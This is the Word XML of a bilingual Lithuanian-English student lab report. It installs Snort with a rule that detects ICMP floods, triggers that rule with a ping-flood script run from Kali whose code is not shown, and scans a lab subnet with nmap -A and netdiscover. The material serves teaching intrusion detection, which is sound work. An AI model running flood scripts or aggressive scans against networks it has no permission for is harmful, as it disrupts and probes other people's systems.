    <w:p w14:paraId="42370011" w14:textId="6D004634" w:rsidR="004E64C0" w:rsidRPr="00352171" w:rsidRDefault="004E64C0" w:rsidP="002334F7">
      <w:r w:rsidRPr="00352171">
        <w:t>LT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09380FD2" w14:textId="72C67757" w:rsidR="004E64C0" w:rsidRPr="00352171" w:rsidRDefault="004E64C0" w:rsidP="002334F7">
      <w:r w:rsidRPr="00352171">
        <w:t>Ubuntu terminale, įvedame “apt update -y” bei “apt upgrade -y”. Palaukiame kol viską paruoš ir tada įvedame “apt install snort”. Kai išmes GUI lentelę, įvedame savo tinklo adresą (mano atveju 10.0.2.0/24) ir spaudžiame ENTER mygtuką. Tai padarius, patikriname ar viskas pavyko sėkmingai “snort –version”. Jeigu jums rodo, taip kaip pas mane, reiškias viską atlikote teisingai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501E385F" w14:textId="09AFD177" w:rsidR="00F05CDA" w:rsidRPr="00352171" w:rsidRDefault="004E64C0" w:rsidP="00F05CDA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>In the Ubuntu terminal, enter apt update -y and apt upgrade -y. Wait until everything is prepared, and then type apt install snort. When the GUI menu appears, enter your network address (in my case 10.0.2.0/24) and press the ENTER key. After doing that, check if everything was successful with snort --version. If it shows the same result as mine, that means you did everything correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1904CBE0" w14:textId="5663DCE6" w:rsidR="004E64C0" w:rsidRPr="00352171" w:rsidRDefault="00F05CDA" w:rsidP="002334F7">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C4BFCE2" wp14:editId="33D91F26">
            <wp:extent cx="6645910" cy="873125"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="1363600077"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00077" name="Picture 1" descr="A computer screen shot of a black background&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="873125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAD8BF9" w14:textId="2DAA0745" w:rsidR="00F05CDA" w:rsidRPr="00352171" w:rsidRDefault="00F05CDA" w:rsidP="002334F7">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EE5B3BC" wp14:editId="051820D2">
            <wp:extent cx="6543103" cy="1189990"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1724321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21702" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId51"/>
                    <a:srcRect t="74396"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6562403" cy="1193500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD39B7F" w14:textId="17297BBC" w:rsidR="00F05CDA" w:rsidRPr="00352171" w:rsidRDefault="00F05CDA" w:rsidP="002334F7">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D7CAC85" wp14:editId="68F50AED">
            <wp:extent cx="3762900" cy="676369"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1664740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06" name="Picture 1" descr="A black background with white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3762900" cy="676369"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A485D6" w14:textId="585360CA" w:rsidR="00F05CDA" w:rsidRPr="00352171" w:rsidRDefault="00F05CDA" w:rsidP="002334F7">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11B4F915" wp14:editId="4132BD66">
            <wp:extent cx="4705350" cy="828675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="982957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7965" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4705350" cy="828675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2366FE33" w14:textId="46339E3B" w:rsidR="00F05CDA" w:rsidRPr="00352171" w:rsidRDefault="00F05CDA" w:rsidP="002334F7">
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="454A23B6" wp14:editId="189CEFA4">
            <wp:extent cx="6645910" cy="1445895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="13699070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07029" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1445895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="526EAD74" w14:textId="77777777" w:rsidR="00F05CDA" w:rsidRPr="00352171" w:rsidRDefault="00F05CDA" w:rsidP="002334F7"/>
    <w:p w14:paraId="5FB42FFE" w14:textId="3903660C" w:rsidR="00F05CDA" w:rsidRPr="00352171" w:rsidRDefault="00F05CDA" w:rsidP="002334F7">
      <w:r w:rsidRPr="00352171">
        <w:t>LT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403271A2" w14:textId="4FD6098F" w:rsidR="00F05CDA" w:rsidRPr="00352171" w:rsidRDefault="00F05CDA" w:rsidP="002334F7">
      <w:r w:rsidRPr="00352171">
        <w:t>Tada Ubuntu sistemoje einate į Snort taisykles “nano /etc/snort/rules/local.rules” ir pačioj apačioj įvedate:</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>“alert icmp any any -&gt; any any (msg:”Aptikta ICMP ataka / ICMP flood attack detected”; itype 8; detection_filter:track by_src, count 50, seconds 10; sid:1000001; rev:1;)</w:t>
      </w:r>
      <w:r w:rsidR="008C2672" w:rsidRPr="00352171">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FA03B3" w14:textId="2C3EAE6C" w:rsidR="00751B7B" w:rsidRPr="00352171" w:rsidRDefault="00751B7B" w:rsidP="00751B7B">
      <w:pPr>
        <w:ind w:left="1290"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>* Alert – veiksmas</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:tab/>
        <w:t>* icmp – protokolas</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* any any -&gt; any any – diapozonas adresų ir portų iš kurių tikėtina ataka bei kuriuos stebės pranešimui</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066ABF4C" w14:textId="0B593527" w:rsidR="00751B7B" w:rsidRPr="00352171" w:rsidRDefault="00751B7B" w:rsidP="00751B7B">
      <w:pPr>
        <w:ind w:left="1290"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>* msg:”…” – mūsų norimas pranešimas</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* itype:8 – paketo tipas (šiuo atveju PING (ECHO REQUEST))</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>*  detection_filter:track by_src, count 50, seconds 10 – stebės ar 10 sekundžių intervale gaunam daugiau nei 50 paketų iš to paties šaltinio</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* sid:1000001 – taisyklės atpažinimo kodas (ID)</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* rev:1 – taisyklės versija</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415D06EC" w14:textId="2ED2DF43" w:rsidR="00751B7B" w:rsidRPr="00352171" w:rsidRDefault="00F05CDA" w:rsidP="002334F7">
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>Išsaugote “CTRL + S” ir išeinate “CTRL + X”. Įvedate</w:t>
      </w:r>
      <w:r w:rsidR="00751B7B" w:rsidRPr="00352171">
        <w:t xml:space="preserve"> terminale “snort -c /etc/snort/rules/local.rules -</w:t>
      </w:r>
      <w:r w:rsidR="008C2672" w:rsidRPr="00352171">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00751B7B" w:rsidRPr="00352171">
        <w:t xml:space="preserve"> enp0s3 -A console”. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EED85D8" w14:textId="60482FAB" w:rsidR="00751B7B" w:rsidRPr="00352171" w:rsidRDefault="00751B7B" w:rsidP="002334F7">
      <w:r w:rsidRPr="00352171">
        <w:tab/>
        <w:t>* -c – mūsų taisyklės vieta</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:tab/>
        <w:t>* -i – tinklo adapteris (enp0s3</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:tab/>
        <w:t>* -A vieta, kur norime išvesti pranešimus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272D553E" w14:textId="77777777" w:rsidR="00751B7B" w:rsidRPr="00352171" w:rsidRDefault="00751B7B" w:rsidP="002334F7"/>
    <w:p w14:paraId="5CD180C1" w14:textId="23297E59" w:rsidR="00751B7B" w:rsidRPr="00352171" w:rsidRDefault="00751B7B" w:rsidP="002334F7">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">Paleidę aptikimo sistemą, atsidarome Kali sistemą ir keliaujame į aplankalą, kuriame yra anksčiau sukurtas “PING flood” skriptas. Paleidžiame jį “python </w:t>
      </w:r>
      <w:r w:rsidR="008C2672" w:rsidRPr="00352171">
        <w:t>ICMPflood.py” ir grįžtame į Ubuntu sistemą. Jei viską atlikote teisingai, jums turėtų pranešti dėl bandymo jus užpulti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F4F74F" w14:textId="3CF33752" w:rsidR="008C2672" w:rsidRPr="00352171" w:rsidRDefault="008C2672" w:rsidP="002334F7"/>
    <w:p w14:paraId="212102A3" w14:textId="0C79F241" w:rsidR="008C2672" w:rsidRPr="00352171" w:rsidRDefault="008C2672" w:rsidP="002334F7"/>
    <w:p w14:paraId="3D4F60A2" w14:textId="77777777" w:rsidR="008C2672" w:rsidRPr="00352171" w:rsidRDefault="008C2672">
      <w:r w:rsidRPr="00352171">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBF3C52" w14:textId="1CA22EC9" w:rsidR="008C2672" w:rsidRPr="00352171" w:rsidRDefault="008C2672" w:rsidP="002334F7">
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">EN: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8828EC" w14:textId="25CF4D4D" w:rsidR="008C2672" w:rsidRPr="00352171" w:rsidRDefault="008C2672" w:rsidP="002334F7">
      <w:r w:rsidRPr="00352171">
        <w:t>In the Ubuntu system, go to the Snort rules file using nano /etc/snort/rules/local.rules, and at the very bottom enter the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403F6A45" w14:textId="3B79C283" w:rsidR="008C2672" w:rsidRPr="00352171" w:rsidRDefault="008C2672" w:rsidP="002334F7">
      <w:r w:rsidRPr="00352171">
        <w:t>alert icmp any any -&gt; any any (msg:”Aptikta ICMP ataka / ICMP flood attack detected”; itype 8; detection_filter:track by_src, count 50, seconds 10; sid:1000001; rev:1;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5487C98E" w14:textId="6C39BA8E" w:rsidR="008C2672" w:rsidRPr="00352171" w:rsidRDefault="008C2672" w:rsidP="008C2672">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>* alert – the action to take</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* icmp – the protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* any any -&gt; any any – the range of source and destination addresses and ports to monitor for potential attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* msg:"…" – the custom alert message we want to display</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* itype:8 – packet type (in this case, PING / ECHO REQUEST)</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* detection_filter:track by_src, count 50, seconds 10 – monitors whether more than 50 packets are received from the same source within 10 seconds</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* sid:1000001 – rule identifier (ID)</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* rev:1 – rule version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A618CC5" w14:textId="77777777" w:rsidR="008C2672" w:rsidRPr="00352171" w:rsidRDefault="008C2672" w:rsidP="002334F7"/>
    <w:p w14:paraId="3AD634A3" w14:textId="77777777" w:rsidR="008C2672" w:rsidRPr="00352171" w:rsidRDefault="008C2672" w:rsidP="008C2672">
      <w:r w:rsidRPr="00352171">
        <w:t>Save with CTRL + O, then exit with CTRL + X.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AE2CA1" w14:textId="77777777" w:rsidR="008C2672" w:rsidRPr="00352171" w:rsidRDefault="008C2672" w:rsidP="008C2672">
      <w:r w:rsidRPr="00352171">
        <w:t>In the terminal, run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447135CC" w14:textId="4201CD6C" w:rsidR="008C2672" w:rsidRPr="00352171" w:rsidRDefault="008C2672" w:rsidP="002334F7">
      <w:r w:rsidRPr="00352171">
        <w:t>Snort -c /etc/snort/snort.conf -i enp0s3 -A console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDC964E" w14:textId="7B3A5EB6" w:rsidR="00B36F79" w:rsidRPr="00352171" w:rsidRDefault="00B36F79" w:rsidP="00B36F79">
      <w:pPr>
        <w:ind w:left="1290"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>* -c – specifies the configuration file to use (our Snort rules location)</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* -i – selects the network interface to monitor (e.g. enp0s3)</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* -A – defines where and how alerts should be displayed (e.g. console output)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3400DE" w14:textId="09985FB5" w:rsidR="00B36F79" w:rsidRPr="00352171" w:rsidRDefault="00741093" w:rsidP="002334F7">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>After starting the detection system, open the Kali machine and go to the folder containing the previously created “PING flood” script. Run it with python ICMPflood.py and then return to the Ubuntu system. If you did everything correctly, Snort should alert you about the attack attempt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3806AAA4" w14:textId="77777777" w:rsidR="00741093" w:rsidRPr="00352171" w:rsidRDefault="00741093" w:rsidP="002334F7"/>
    <w:p w14:paraId="4347FD10" w14:textId="77777777" w:rsidR="00741093" w:rsidRPr="00352171" w:rsidRDefault="00741093" w:rsidP="002334F7"/>
    <w:p w14:paraId="6EABE819" w14:textId="5A8515C4" w:rsidR="00741093" w:rsidRPr="00352171" w:rsidRDefault="00741093" w:rsidP="002334F7"/>
    <w:p w14:paraId="3EA0F71D" w14:textId="77777777" w:rsidR="00741093" w:rsidRPr="00352171" w:rsidRDefault="00741093">
      <w:r w:rsidRPr="00352171">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5086B2C5" w14:textId="21CE6CFF" w:rsidR="00741093" w:rsidRPr="00352171" w:rsidRDefault="00741093" w:rsidP="00741093">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:t>Užduotis Nr. 8</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>(Exercise 8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFBC49C" w14:textId="77777777" w:rsidR="007737DC" w:rsidRPr="00352171" w:rsidRDefault="007737DC" w:rsidP="007737DC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>Skanavimo įrankiai</w:t>
      </w:r>
      <w:r w:rsidR="00741093" w:rsidRPr="00352171">
        <w:br/>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00741093" w:rsidRPr="00352171">
        <w:t>canning tool</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00741093" w:rsidRPr="00352171">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D987E60" w14:textId="2878BE76" w:rsidR="007737DC" w:rsidRPr="00352171" w:rsidRDefault="007737DC" w:rsidP="007737DC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B2F833E" wp14:editId="623C6E71">
            <wp:extent cx="4865905" cy="2228850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18596253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530" name="Picture 1" descr="A computer screen shot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4869139" cy="2230332"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1867512F" wp14:editId="726265A6">
            <wp:extent cx="4876167" cy="2724150"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="602074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74435" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4884929" cy="2729045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="535404DA" wp14:editId="726B5A44">
            <wp:extent cx="4895850" cy="2998042"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1159376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6376" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4905139" cy="3003730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A3E50A" w14:textId="1AD1EB8B" w:rsidR="00D72201" w:rsidRPr="00352171" w:rsidRDefault="00D72201" w:rsidP="007737DC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="090D345E" wp14:editId="7DCB6F0B">
            <wp:extent cx="6645910" cy="2558415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1475510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0718" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2558415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D29F5FA" w14:textId="34B923A0" w:rsidR="00741093" w:rsidRPr="00352171" w:rsidRDefault="00741093" w:rsidP="00741093">
      <w:r w:rsidRPr="00352171">
        <w:t>LT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B74A65" w14:textId="5C9A498D" w:rsidR="007737DC" w:rsidRPr="00352171" w:rsidRDefault="007737DC" w:rsidP="00741093">
      <w:r w:rsidRPr="00352171">
        <w:t>Yra keli tinklo skanavimo įrankiai: “</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>netdiscover</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>” arba “</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B11058A" w14:textId="77777777" w:rsidR="00D72201" w:rsidRPr="00352171" w:rsidRDefault="007737DC" w:rsidP="00741093">
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>**</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217A34C3" w14:textId="072C56F7" w:rsidR="007737DC" w:rsidRPr="00352171" w:rsidRDefault="007737DC" w:rsidP="00741093">
      <w:r w:rsidRPr="00352171">
        <w:t>Tinklo skanavimas su “nmap” – “nmap -A 10.0.2.1/24”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFDEA34" w14:textId="799DD2DA" w:rsidR="007737DC" w:rsidRPr="00352171" w:rsidRDefault="007737DC" w:rsidP="00741093">
      <w:r w:rsidRPr="00352171">
        <w:tab/>
        <w:t>* -A – agresyvus skanavimo būdas (gali šiek tiek užtrukti)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49515ED8" w14:textId="77777777" w:rsidR="00D72201" w:rsidRPr="00352171" w:rsidRDefault="007737DC" w:rsidP="00741093">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">Jame matysis visas sąrašas įrenginių, jų adresų ir portų. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40026FE0" w14:textId="478B6292" w:rsidR="007737DC" w:rsidRPr="00352171" w:rsidRDefault="007737DC" w:rsidP="00741093">
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B4DD57" w14:textId="77777777" w:rsidR="007737DC" w:rsidRPr="00352171" w:rsidRDefault="007737DC" w:rsidP="00741093"/>
    <w:p w14:paraId="2EAE60A7" w14:textId="77777777" w:rsidR="00D72201" w:rsidRPr="00352171" w:rsidRDefault="007737DC" w:rsidP="00741093">
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>**</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CB64C0" w14:textId="670E67BB" w:rsidR="007737DC" w:rsidRPr="00352171" w:rsidRDefault="007737DC" w:rsidP="00741093">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">Tinklo skanavimas su </w:t>
      </w:r>
      <w:r w:rsidR="00D72201" w:rsidRPr="00352171">
        <w:t>“netdiscover” – “netdiscover -r 10.0.2.1/24”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CE51FD" w14:textId="77777777" w:rsidR="00D72201" w:rsidRPr="00352171" w:rsidRDefault="00D72201" w:rsidP="00741093">
      <w:r w:rsidRPr="00352171">
        <w:tab/>
        <w:t xml:space="preserve">* -r – diapozonas </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762B44F2" w14:textId="51B05C36" w:rsidR="00D72201" w:rsidRPr="00352171" w:rsidRDefault="00D72201" w:rsidP="00741093">
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100EF542" w14:textId="0408B8F9" w:rsidR="00D72201" w:rsidRPr="00352171" w:rsidRDefault="00D72201" w:rsidP="00741093">
      <w:r w:rsidRPr="00352171">
        <w:t>Man asmeniškai “netdiscover” yra patogesnis, tačiau didesniems tinklams “nmap” yra būtinas dėl didelio įrenginių kiekio, kad žinoti, kurio prietaiso koks IP ir MAC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F3A901" w14:textId="77777777" w:rsidR="00D72201" w:rsidRPr="00352171" w:rsidRDefault="00D72201" w:rsidP="00741093"/>
